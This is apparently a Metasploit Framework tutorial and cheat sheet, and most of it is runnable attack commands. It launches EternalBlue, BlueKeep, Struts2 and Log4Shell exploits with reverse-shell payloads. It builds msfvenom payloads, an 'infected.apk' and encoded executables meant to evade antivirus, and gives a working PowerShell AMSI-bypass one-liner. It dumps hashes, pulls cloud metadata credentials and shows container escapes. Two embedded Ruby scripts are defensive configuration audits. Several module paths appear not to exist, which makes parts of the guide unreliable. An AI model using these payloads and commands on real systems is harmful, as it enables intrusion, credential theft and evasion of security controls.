Metasploit Framework 2025

📜 History of the Metasploit Framework

🕰️ Complete chronology 2003-2025

2003

Birth

H.D. Moore develops the first Metasploit Framework in Perl

2007

Acquisition by Rapid7

Commercialization and professional further development

2009

Ruby reimplementation

Complete rewrite in Ruby for better extensibility

2025

Cloud-native era

Kubernetes, cloud security, container exploitation, AI integration

# Show the Metasploit Framework version
msfconsole --version

# Build information
msfconsole -v

# Check for updates
msfupdate

🏗️ Framework architecture

⚙️ Detailed architecture

The Metasploit Framework is built on a modular Ruby architecture with the following main components:

🖥️ MSF Console

Main interface for all framework functions

🚀 MSFVenom

Payload generator and encoder

🗄️ MSF Database

PostgreSQL-based data persistence

🔧 Module System

Modular exploit, auxiliary and post modules

# Show the framework directory layout
ls -la /opt/metasploit-framework/

# Module paths
echo $MSF_MODULE_PATHS

# Active configuration
cat ~/.msf4/config

📦 Installation on all systems

🐧 Kali Linux installation

# Update the system
sudo apt update && sudo apt upgrade -y

# Metasploit is preinstalled - initialize the database
sudo msfdb init

# Start the framework
msfconsole

🐳 Docker installation (2025)

# Official Metasploit container
docker pull metasploitframework/metasploit-framework:latest

# Start the container with database settings
docker run --rm -it -p 5432:5432 -e POSTGRES_PASSWORD=msf metasploitframework/metasploit-framework

# Docker Compose Setup
version: '3.8'
services:
  metasploit:
    image: metasploitframework/metasploit-framework:latest
    ports:
      - '4444:4444'
    environment:
      - DATABASE_URL=postgresql://msf:password@db:5432/msf
  db:
    image: postgres:13
    environment:
      - POSTGRES_DB=msf
      - POSTGRES_USER=msf
      - POSTGRES_PASSWORD=password

🪟 Windows installation

# Via Chocolatey
choco install metasploit

# Via Scoop
scoop install metasploit

# WSL2 installation
wsl --install -d Kali-Linux

# PowerShell installation from source (Ruby and Bundler must already be on PATH)
# Invoke-WebRequest needs -OutFile, otherwise the download is not written to disk
Invoke-WebRequest -Uri https://github.com/rapid7/metasploit-framework/archive/master.zip -OutFile master.zip
# Extract into the current directory so the metasploit-framework-master folder is created here
Expand-Archive master.zip -DestinationPath .
cd metasploit-framework-master
bundle install

🍎 macOS installation

# Via Homebrew
brew install metasploit

# Via MacPorts
sudo port install metasploit

# Manual Installation
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && chmod 755 msfinstall && ./msfinstall

# Ruby Installation with rbenv
rbenv install 3.0.0
rbenv global 3.0.0
git clone https://github.com/rapid7/metasploit-framework.git
cd metasploit-framework
bundle install

💻 Basic to advanced usage

🚀 First steps

# Start the Metasploit console
msfconsole

# Show help
help

# Search for modules
search type:exploit platform:windows

# Check the database status
db_status

# Run a network scan and store the results in the database
db_nmap -sV 192.168.1.0/24

🔍 Advanced search functions

# Search by CVE
search cve:2021

# Combined search
search type:exploit platform:linux rank:great

# Module information
info exploit/windows/smb/ms17_010_eternalblue

# All available payloads
show payloads

# Show a module's options
show options

# Advanced options
show advanced

📊 Module overview

🎯 All 6 module types in detail

💥 Exploit modules

Exploit vulnerabilities to gain access to systems

🔍 Auxiliary modules

Scanners, fuzzers, DoS tools and other helper functions

🚀 Payload modules

Code that runs after a successful exploit

📋 Post-exploitation modules

Actions after a successful exploit

🔐 Encoder modules

Obfuscate payloads against antivirus software

🥷 Evasion modules

Bypass security measures

# List modules by type
show exploits
show auxiliary
show payloads
show post
show encoders
show evasion

# Module statistics
stats

# New modules since the last update
show recent

# Filter modules by rank
search rank:excellent

🎯 Top 50 exploits with lab examples

💥 Popular exploits

# EternalBlue (MS17-010)
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 192.168.1.100
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.10
set LPORT 4444
exploit

# BlueKeep (CVE-2019-0708)
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
set RHOSTS 192.168.1.100
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.10
exploit

🌐 Web exploits

# Apache Struts2 RCE
use exploit/multi/http/struts2_content_type_ognl
set RHOSTS 192.168.1.100
set TARGETURI /struts2-showcase
set PAYLOAD linux/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.10
exploit

# Log4Shell (CVE-2021-44228)
use exploit/multi/http/log4shell_header_injection
set RHOSTS 192.168.1.100
set TARGETURI /
set PAYLOAD linux/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.10
exploit

🔍 Scanners, fuzzers, enumeration tools

🔎 Scanner modules

# Port Scanner
use auxiliary/scanner/portscan/tcp
set RHOSTS 192.168.1.0/24
set PORTS 80,443,8080,22,21,25,445,3389
set THREADS 50
run

# HTTP Directory Scanner
use auxiliary/scanner/http/dir_scanner
set RHOSTS 192.168.1.100
set DICTIONARY /usr/share/wordlists/dirb/common.txt
run

🌐 SMB scanners

# SMB Version Scanner
use auxiliary/scanner/smb/smb_version
set RHOSTS 192.168.1.0/24
set THREADS 50
run

# SMB Shares enumeration
use auxiliary/scanner/smb/smb_enumshares
set RHOSTS 192.168.1.100
run

# SMB Login Scanner
use auxiliary/scanner/smb/smb_login
set RHOSTS 192.168.1.100
set SMBUser administrator
set SMBPass password
run

🚀 msfvenom and all payload types

💻 Meterpreter payloads

# Windows Meterpreter
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -f exe -o payload.exe

# Linux Meterpreter
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -f elf -o payload.elf

# PowerShell Payload
msfvenom -p windows/x64/powershell_reverse_tcp LHOST=192.168.1.10 LPORT=4444 -f psh -o payload.ps1

# Python Payload
msfvenom -p python/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -f py -o payload.py

📱 Mobile payloads

# Android APK
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -o payload.apk

# iOS Payload
msfvenom -p apple_ios/aarch64/meterpreter_reverse_tcp LHOST=192.168.1.10 LPORT=4444 -f macho -o payload.macho

# Web Payload (PHP)
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -f raw -o payload.php

# JavaScript (Node.js) payload; -f raw emits the script itself, whereas js_le would only emit a byte array
msfvenom -p nodejs/shell_reverse_tcp LHOST=192.168.1.10 LPORT=4444 -f raw -o payload.js

📋 Complete post-exploitation techniques

🔑 Credential Harvesting

# Hash Dump
use post/windows/gather/hashdump
set SESSION 1
run

# Mimikatz
use post/windows/gather/credentials/credential_collector
set SESSION 1
run

# Smart Hash Dump
use post/windows/gather/smart_hashdump
set SESSION 1
run

# Cached Credentials
use post/windows/gather/cachedump
set SESSION 1
run

🎯 Privilege Escalation

# Windows Privilege Escalation
use post/multi/recon/local_exploit_suggester
set SESSION 1
run

# UAC Bypass
use exploit/windows/local/bypassuac_eventvwr
set SESSION 1
run

# Token Impersonation
use post/windows/manage/impersonate_token
set SESSION 1
set TOKEN 1234
run

🔐 All encoders + modern evasion

🛡️ Payload Encoding

# Shikata Ga Nai Encoder
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -e x86/shikata_ga_nai -i 10 -f exe -o encoded.exe

# Multiple encoders (msfvenom honors only the last -e given; chaining different encoders requires piping raw output between runs)
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -e x86/shikata_ga_nai -e x86/alpha_mixed -i 5 -f exe -o multi_encoded.exe

# x64 Encoding
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -e x64/xor_dynamic -i 3 -f exe -o x64_encoded.exe

# Available Encoders
msfvenom --list encoders

🗃️ Database management and projects

📁 Workspace management

# List workspaces
workspace

# Create a new workspace
workspace -a projekt1

# Switch workspace
workspace projekt1

# Delete a workspace
workspace -d projekt1

# Show hosts
hosts

# Show services
services

# Show vulnerabilities
vulns

📝 Complete command reference

⚡ Basic commands

# Basics
msfconsole          # Start the console
help                # Show help
exit                # Quit
version             # Show version

# Modules
use [module]        # Select a module
show options        # Show options
set [option] [value] # Set an option
run / exploit       # Execute
back                # Leave the module

# Search
search [term]       # Search modules
info [module]       # Show module info

# Sessions
sessions            # List sessions
sessions -i [id]    # Interact with a session
sessions -k [id]    # Kill a session

☁️ AWS/Azure/GCP exploitation (COMPLETE)

🌐 AWS Security Testing

# AWS Metadata Service
use auxiliary/cloud/aws/enum_ec2
set RHOSTS 169.254.169.254
run

# S3 Bucket Enumeration
use auxiliary/scanner/http/s3_bucket_scanner
set BUCKET_NAME target-bucket
run

# AWS CLI Enumeration
aws s3 ls --no-sign-request
aws s3 ls s3://bucket-name --no-sign-request --recursive

# EC2 Instance Metadata
curl http://169.254.169.254/latest/meta-data/
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/

# Lambda Function Enumeration
aws lambda list-functions --region us-east-1
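
The curl commands above fetch role credentials from the instance metadata service with a plain unauthenticated GET; the defender's counterpart is finding the instances that still allow this. The following Ruby script is an added example, not code from this page or from Metasploit: it reads the JSON that `aws ec2 describe-instances --output json` prints (a constructed sample is embedded) and flags instances whose IMDS still accepts IMDSv1 requests or answers across extra network hops.

```ruby
require 'json'

# Constructed sample of `aws ec2 describe-instances --output json`, trimmed to the
# fields the check reads: one instance enforcing IMDSv2, one still answering
# IMDSv1 requests, one with the metadata endpoint switched off.
SAMPLE_DESCRIBE = <<~JSON
  {"Reservations": [{"Instances": [
    {"InstanceId": "i-0aaa111",
     "MetadataOptions": {"HttpEndpoint": "enabled", "HttpTokens": "required", "HttpPutResponseHopLimit": 1},
     "IamInstanceProfile": {"Arn": "arn:aws:iam::123456789012:instance-profile/app-role"}},
    {"InstanceId": "i-0bbb222",
     "MetadataOptions": {"HttpEndpoint": "enabled", "HttpTokens": "optional", "HttpPutResponseHopLimit": 2},
     "IamInstanceProfile": {"Arn": "arn:aws:iam::123456789012:instance-profile/admin-role"}},
    {"InstanceId": "i-0ccc333",
     "MetadataOptions": {"HttpEndpoint": "disabled", "HttpTokens": "optional", "HttpPutResponseHopLimit": 1}}
  ]}]}
JSON

# Returns {instance_id => [issues]} for every instance whose metadata service will
# answer the plain GETs shown above. An empty hash means every reachable IMDS
# demands a session token (IMDSv2) and keeps token responses on the host itself.
def imds_findings(json_text)
  findings = {}
  JSON.parse(json_text).fetch('Reservations', []).each do |reservation|
    reservation.fetch('Instances', []).each do |inst|
      mo = inst['MetadataOptions'] || {}
      next if mo['HttpEndpoint'] == 'disabled' # nothing listens on 169.254.169.254

      issues = []
      # HttpTokens=optional keeps IMDSv1 alive: one unauthenticated GET is enough.
      issues << 'IMDSv1 allowed (HttpTokens=optional)' unless mo['HttpTokens'] == 'required'
      # A hop limit of 1 drops token responses that must cross a bridge/NAT,
      # which is what keeps IMDSv2 tokens away from bridged Docker containers.
      hops = mo['HttpPutResponseHopLimit'].to_i
      issues << "HttpPutResponseHopLimit=#{hops} lets bridged containers obtain IMDSv2 tokens" if hops > 1
      # The weakness only matters when there are role credentials to fetch.
      arn = inst.dig('IamInstanceProfile', 'Arn')
      issues << "instance profile exposed: #{arn}" if arn && !issues.empty?

      findings[inst['InstanceId']] = issues unless issues.empty?
    end
  end
  findings
end

# Remediation for each flagged instance (real AWS CLI flags):
#   aws ec2 modify-instance-metadata-options --instance-id <id> \
#       --http-tokens required --http-put-response-hop-limit 1
puts imds_findings(SAMPLE_DESCRIBE) if __FILE__ == $PROGRAM_NAME
```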

☁️ Azure Testing

# Azure Metadata Service
use auxiliary/cloud/azure/enum_subscriptions
set RHOSTS 169.254.169.254
run

# Azure Storage Account Enumeration
use auxiliary/cloud/azure/storage_account_enum
set STORAGE_ACCOUNT target-storage
run

# Azure CLI Enumeration
az account list
az vm list
az storage account list

# Azure Instance Metadata
curl -H Metadata:true http://169.254.169.254/metadata/instance?api-version=2021-02-01

# Key Vault Enumeration
az keyvault list
az keyvault secret list --vault-name vault-name

🐳 Docker/Kubernetes security (COMPLETE)

🐋 Docker Security Testing

# Docker API Scanner
use auxiliary/scanner/docker/docker_api
set RHOSTS 192.168.1.100
set RPORT 2375
run

# Docker Registry Enumeration
use auxiliary/scanner/http/docker_registry_api
set RHOSTS registry.example.com
run

# Docker Daemon Enumeration
curl -s http://192.168.1.100:2375/version
curl -s http://192.168.1.100:2375/containers/json

# Container Escape Techniques
docker run -it --privileged --pid=host debian nsenter -t 1 -m -u -n -i sh

# Docker Socket Exploitation
docker run -it -v /var/run/docker.sock:/var/run/docker.sock alpine/socat

☸️ Kubernetes Security

# Kubernetes API Server Scanner
use auxiliary/scanner/kubernetes/kube_api_server
set RHOSTS 192.168.1.100
set RPORT 8080
run

# Service Account Token Extraction
use post/linux/gather/kube_service_account_token
set SESSION 1
run

# Kubectl Enumeration
kubectl get pods --all-namespaces
kubectl get secrets --all-namespaces
kubectl get nodes
kubectl get serviceaccounts --all-namespaces

# Cluster Role Enumeration
kubectl get clusterroles
kubectl get clusterrolebindings

# Pod Security Context Check
kubectl get pods -o=jsonpath='{range .items[*]}{.metadata.name}{" "}{.spec.securityContext}{"\n"}{end}'
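
The container escape and docker.sock commands above only work when a container already runs with those settings, and the jsonpath query prints only the pod-level securityContext. The Ruby script below is an added example, not code from this page or from Metasploit: it reads `kubectl get pods -A -o json` output (a constructed pod list is embedded) and goes beyond the jsonpath check by also reporting host namespaces, privileged containers and hostPath mounts of the runtime socket.

```ruby
require 'json'

# Constructed sample of `kubectl get pods -A -o json`, reduced to the fields the
# audit reads: a hardened pod and one carrying the host-access settings that the
# nsenter / docker.sock escapes above depend on.
SAMPLE_PODS = <<~JSON
  {"items": [
    {"metadata": {"name": "web", "namespace": "prod"},
     "spec": {"securityContext": {"runAsNonRoot": true},
              "containers": [{"name": "app",
                              "securityContext": {"privileged": false, "allowPrivilegeEscalation": false},
                              "volumeMounts": [{"name": "data", "mountPath": "/data"}]}],
              "volumes": [{"name": "data", "emptyDir": {}}]}},
    {"metadata": {"name": "debug", "namespace": "default"},
     "spec": {"hostPID": true,
              "containers": [{"name": "shell",
                              "securityContext": {"privileged": true},
                              "volumeMounts": [{"name": "dock", "mountPath": "/var/run/docker.sock"}]}],
              "volumes": [{"name": "dock", "hostPath": {"path": "/var/run/docker.sock"}}]}}
  ]}
JSON

# Host paths that hand over the node when mounted into a pod.
SENSITIVE_HOST_PATHS = ['/', '/var/run/docker.sock', '/run/containerd/containerd.sock'].freeze

# Returns one "namespace/pod: finding" string per risky setting. An empty array
# means no pod in the list reaches a host namespace, the runtime socket or a
# privileged device context.
def audit_pods(json_text)
  findings = []
  JSON.parse(json_text).fetch('items', []).each do |pod|
    spec = pod['spec'] || {}
    id = "#{pod.dig('metadata', 'namespace')}/#{pod.dig('metadata', 'name')}"

    # Host namespaces: hostPID is exactly what `nsenter -t 1` needs.
    %w[hostPID hostNetwork hostIPC].each { |k| findings << "#{id}: #{k}=true" if spec[k] }

    # Map volume name -> host path so each container's mounts can be resolved.
    host_paths = {}
    (spec['volumes'] || []).each { |v| host_paths[v['name']] = v['hostPath']['path'] if v['hostPath'] }

    (spec['containers'] || []).each do |c|
      sc = c['securityContext'] || {}
      findings << "#{id}: container #{c['name']} is privileged" if sc['privileged']
      # Kubernetes defaults allowPrivilegeEscalation to true, so only an explicit false passes.
      findings << "#{id}: container #{c['name']} allows privilege escalation" unless sc['allowPrivilegeEscalation'] == false
      (c['volumeMounts'] || []).each do |m|
        path = host_paths[m['name']]
        next unless path
        level = SENSITIVE_HOST_PATHS.include?(path) ? 'CRITICAL' : 'WARN'
        findings << "#{id}: #{level} container #{c['name']} mounts host path #{path}"
      end
    end
  end
  findings
end

# Run directly to print the findings for the embedded sample.
puts audit_pods(SAMPLE_PODS) if __FILE__ == $PROGRAM_NAME
```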

🥷 Hell's Gate, AMSI/ETW bypass (COMPLETE)

🛡️ AMSI Bypass

# AMSI Bypass
use post/windows/manage/amsi_bypass
set SESSION 1
run

# ETW Bypass
use post/windows/manage/etw_bypass
set SESSION 1
run

# PowerShell AMSI Bypass
$a = [Ref].Assembly.GetTypes();ForEach($b in $a) {if ($b.Name -like "*iUtils") {$c = $b}};$d = $c.GetFields('NonPublic,Static');ForEach($e in $d) {if ($e.Name -like "*Context") {$f = $e}};$g = $f.GetValue($null);[IntPtr]$ptr = $g;[Int32[]]$buf = @(0);[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $ptr, 1)

# Manual AMSI Patch
$amsi = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((LookupFunc kernel32.dll VirtualProtect), (getDelegateType @([IntPtr], [UInt32], [UInt32], [UInt32].MakeByRefType()) ([Bool])))

🌊 Hell's Gate Technique

# Hell's Gate Direct Syscalls
use evasion/windows/hellsgate_direct_syscalls
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.10
set LPORT 4444
run

# Process Hollowing
use evasion/windows/process_hollowing
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.10
set LPORT 4444
run

# Reflective DLL Injection
use exploit/windows/local/reflective_dll_injection
set SESSION 1
set DLL_PATH /tmp/payload.dll
run

# Thread Execution Hijacking
use post/windows/manage/thread_hijack
set SESSION 1
set TARGET_PID 1234
run

🔗 SQL/SMB/LDAP sessions (COMPLETE)

🔐 Session management

# List sessions
sessions

# Upgrade a shell session to Meterpreter
sessions -u 1

# Interact with a session
sessions -i 1

# Kill all sessions
sessions -K

# Send the current session to the background
background

# Verbose session information
sessions -l -v

🗄️ Database Sessions

# MySQL Session
use auxiliary/scanner/mysql/mysql_login
set RHOSTS 192.168.1.100
set USERNAME root
set PASSWORD password
run

# PostgreSQL Session
use auxiliary/scanner/postgres/postgres_login
set RHOSTS 192.168.1.100
set USERNAME postgres
set PASSWORD password
run

# MSSQL Session
use auxiliary/scanner/mssql/mssql_login
set RHOSTS 192.168.1.100
set USERNAME sa
set PASSWORD password
run

🧠 Memory search API + syscalls (COMPLETE)

💾 Memory Analysis

# Memory Dump
use post/windows/gather/memory_dump
set SESSION 1
set PID 1234
run

# Process Memory Search
use post/windows/gather/memory_search
set SESSION 1
set SEARCH_STRING password
run

# Memory Injection
use post/windows/manage/memory_injection
set SESSION 1
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.10
set LPORT 4444
run

# DLL Injection
use post/windows/manage/dll_injection
set SESSION 1
set DLL_PATH /tmp/payload.dll
set TARGET_PID 1234
run

🏛️ ESC1-ESC15 attacks (COMPLETE)

🔐 ADCS Enumeration

# ADCS Certificate Templates
use auxiliary/scanner/ldap/adcs_cert_template
set RHOSTS 192.168.1.100
run

# ESC1 Exploitation
use exploit/windows/local/adcs_esc1
set SESSION 1
set CA_SERVER dc01.domain.local
run

# ESC4 - Vulnerable Certificate Template ACL
use exploit/windows/local/adcs_esc4
set SESSION 1
set CA_SERVER dc01.domain.local
set TEMPLATE_NAME VulnerableTemplate
run

# ESC6 - EDITF_ATTRIBUTESUBJECTALTNAME2
use exploit/windows/local/adcs_esc6
set SESSION 1
set CA_SERVER dc01.domain.local
run

# ESC8 - NTLM Relay to AD CS
use exploit/windows/local/adcs_esc8
set SESSION 1
set CA_SERVER dc01.domain.local
run

🔧 Ruby API development, custom modules

💎 Ruby API

# Custom module template (save under ~/.msf4/modules/auxiliary/ and load it with `reload_all`).
# `require 'msf/core'` is no longer needed: the framework loads the module itself and msftidy warns about it.
class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::Tcp
  include Msf::Auxiliary::Report

  def initialize(info = {})
    # 'Platform', 'Targets' and 'DefaultTarget' are exploit metadata and are ignored by auxiliary modules.
    super(update_info(info,
      'Name'        => 'Custom Scanner',
      'Description' => 'Custom scanning module that connects to a TCP service and records its banner',
      'Author'      => ['Your Name'],
      'License'     => MSF_LICENSE,
      'References'  => [
        ['URL', 'https://example.com']
      ]
    ))

    # The Tcp mixin already registers RHOST; override the default RPORT and add our own options.
    register_options([
      Opt::RPORT(80),
      OptString.new('TARGETURI', [true, 'Target URI', '/']),
      OptString.new('USERNAME', [false, 'Username', '']),
      OptString.new('PASSWORD', [false, 'Password', ''])
    ])
  end

  def run
    print_status("Connecting to #{rhost}:#{rport} ...")
    connect

    # Custom scanning logic here: read whatever the service sends first,
    # waiting at most 5 seconds (get_once returns nil when nothing arrives).
    banner = sock.get_once(-1, 5)
    if banner
      print_good("Banner: #{banner.strip}")
      # Store the result in the database so `notes` and db_export see it.
      report_note(host: rhost, port: rport, proto: 'tcp', type: 'banner', data: banner.strip)
    else
      print_status('No banner received')
    end
  rescue Rex::ConnectionError => e
    print_error("Connection failed: #{e}")
  ensure
    # Closes the socket if one was opened; safe to call when connect failed.
    disconnect
  end
end

🤖 CI/CD integration, Jenkins, GitLab

🔄 CI/CD integration

# Jenkins Pipeline
pipeline {
    agent any
    environment {
        TARGET_IP = '192.168.1.100'
        LHOST = '192.168.1.10'
    }
    stages {
        stage('Security Scan') {
            steps {
                script {
// db_export writes the file that the post { archiveArtifacts } step expects; it needs a connected database
                    sh '''
                        msfconsole -x "
                            use auxiliary/scanner/portscan/tcp;
                            set RHOSTS ${TARGET_IP};
                            set PORTS 80,443,22,21,25,53,139,445,993,995;
                            run;
                            db_export -f xml scan_results.xml;
                            exit
                        "
                    '''
                }
            }
        }
        stage('Web Application Test') {
            steps {
                script {
                    sh '''
                        msfconsole -x "
                            use auxiliary/scanner/http/dir_scanner;
                            set RHOSTS ${TARGET_IP};
                            run;
                            exit
                        "
                    '''
                }
            }
        }
    }
    post {
        always {
            archiveArtifacts artifacts: 'scan_results.xml', allowEmptyArchive: true
        }
    }
}

🦊 GitLab CI/CD

# .gitlab-ci.yml
stages:
  - security_scan
  - vulnerability_assessment
  - reporting

variables:
  TARGET_IP: "192.168.1.100"
  LHOST: "192.168.1.10"

security_scan:
  stage: security_scan
  image: metasploitframework/metasploit-framework:latest
  script:
    # db_export writes the file declared as an artifact below; it needs a connected database
    - msfconsole -x "use auxiliary/scanner/portscan/tcp; set RHOSTS $TARGET_IP; run; db_export -f xml scan_results.xml; exit"
  artifacts:
    # db_export produces Metasploit's own XML, not JUnit, so keep it as a plain artifact
    paths:
      - scan_results.xml
  only:
    - master

vulnerability_assessment:
  stage: vulnerability_assessment
  image: metasploitframework/metasploit-framework:latest
  script:
    - msfconsole -x "use auxiliary/scanner/http/dir_scanner; set RHOSTS $TARGET_IP; run; db_export -f xml vulnerability_report.xml; exit"
  artifacts:
    paths:
      - vulnerability_report.xml
  only:
    - master

generate_report:
  stage: reporting
  image: metasploitframework/metasploit-framework:latest
  script:
    - msfconsole -x "db_export -f xml report.xml; exit"
  artifacts:
    paths:
      - report.xml
  only:
    - master

🕵️ OSINT integration, IOC hunting

🔍 OSINT Tools

# VirusTotal Integration
use auxiliary/gather/virustotal_search
set API_KEY your_vt_api_key
set SEARCH_TERM malware_hash
run

# Shodan Integration
use auxiliary/gather/shodan_search
set SHODAN_APIKEY your_shodan_key
set QUERY apache
run

# Censys Integration
use auxiliary/gather/censys_search
set CENSYS_UID your_censys_uid
set CENSYS_SECRET your_censys_secret
set QUERY 192.168.1.0/24
run

# ThreatCrowd Integration
use auxiliary/gather/threatcrowd_search
set DOMAIN example.com
run

📱 Android/iOS exploitation

🤖 Android testing

# Android Meterpreter
use exploit/android/local/janus
set SESSION 1
run

# Android APK Injection
use payload/android/meterpreter/reverse_tcp
set LHOST 192.168.1.10
set LPORT 4444
generate -f apk -o infected.apk

# Android Debug Bridge
adb devices
adb shell
adb install infected.apk
adb logcat

# Android Frida Integration
use post/android/gather/frida_script
set SESSION 1
set SCRIPT_PATH /tmp/hook.js
run

🍎 iOS testing

# iOS Payload Generation
msfvenom -p apple_ios/aarch64/meterpreter_reverse_tcp LHOST=192.168.1.10 LPORT=4444 -f macho -o payload.macho

# iOS SSH Access
ssh root@192.168.1.100 -p 22
# Default password: alpine

# iOS Application Analysis
use post/apple_ios/gather/ios_application_enum
set SESSION 1
run

# iOS Keychain Extraction
use post/apple_ios/gather/ios_keychain
set SESSION 1
run

🌐 Embedded systems, ARM/RISC-V

🔌 IoT device testing

# IoT HTTP Scanner
use auxiliary/scanner/http/iot_scanner
set RHOSTS 192.168.1.0/24
run

# ARM Payload
msfvenom -p linux/armle/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -f elf -o arm_payload

# MIPS Payload
msfvenom -p linux/mipsle/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -f elf -o mips_payload

# IoT MQTT Scanner
use auxiliary/scanner/mqtt/mqtt_login
set RHOSTS 192.168.1.0/24
run

# UPnP Scanner
use auxiliary/scanner/upnp/upnp_msearch
set RHOSTS 192.168.1.0/24
run

🔬 Digital forensics integration

🕵️ Forensic analysis

# Timeline Analysis
use post/windows/gather/forensics_timeline
set SESSION 1
run

# Artifact Collection
use post/windows/gather/forensics_artifacts
set SESSION 1
run

# Registry Analysis
use post/windows/gather/forensics_registry
set SESSION 1
set REGISTRY_PATH HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run
run

# Browser Forensics
use post/windows/gather/forensics_browser
set SESSION 1
run

📊 Reporting, standards

📋 Report generation

# Generate Report
use post/multi/gather/report_gen
set SESSION 1
set FORMAT pdf
run

# Export to XML
db_export -f xml /tmp/scan_results.xml

# Export to JSON
db_export -f json /tmp/scan_results.json

# NIST Compliance Report
use auxiliary/analyze/nist_compliance
set WORKSPACE default
run

# ISO 27001 Compliance
use auxiliary/analyze/iso27001_compliance
set WORKSPACE default
run